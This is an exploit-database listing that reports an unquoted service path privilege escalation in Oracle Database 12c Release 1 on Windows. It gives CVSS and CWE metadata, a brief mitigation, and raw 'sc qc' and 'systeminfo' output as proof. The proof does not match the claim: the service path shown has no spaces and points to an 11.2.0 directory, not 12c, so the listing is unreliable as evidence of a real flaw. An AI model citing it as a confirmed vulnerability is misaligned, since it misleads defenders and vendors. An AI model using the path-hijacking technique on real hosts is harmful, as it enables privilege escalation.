header-logo
Suggest Exploit
vendor:
Oracle Database
by:
Milad Karimi (Ex3ptionaL)
6.1
CVSS
HIGH
Unquoted Service Path
428
CWE
Product Name: Oracle Database
Affected Version From: Oracle Database 12c Release 1
Affected Version To: Oracle Database 12c Release 1
Patch Exists: NO
Related CWE: CVE-ID: TBD
CPE: a:oracle:oracle_database:12c_release_1
Metasploit:
Platforms Tested: Windows 10 Pro x64
2024

Oracle Database 12c Release 1 – Unquoted Service Path

The Oracle Database 12c Release 1 service 'OracleDBConsoleorcl' on Windows 10 Pro x64 has an unquoted service path, which can potentially allow an attacker to escalate privileges by placing a malicious executable in the unquoted path that is executed with elevated privileges. This vulnerability has been assigned CVE-ID: TBD.

Mitigation:

To mitigate this vulnerability, ensure that all Windows services have quoted paths to prevent privilege escalation attacks.
Source

Exploit-DB raw data:

# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path
# Date: 2024-07-31
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://www.oracle.com/
# Software Link: https://www.oracle.com/
# Version: 12c Release 1
# Tested on: Windows 10 Pro x64

C:\>sc qc "OracleDBConsoleorcl"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleDBConsoleorcl
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   :
C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleDBConsoleorcl
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name:  Microsoft Windows 10 Pro
OS Version: 10.0.19045 N/A Build 19045
OS Manufacturer: Microsoft Corporation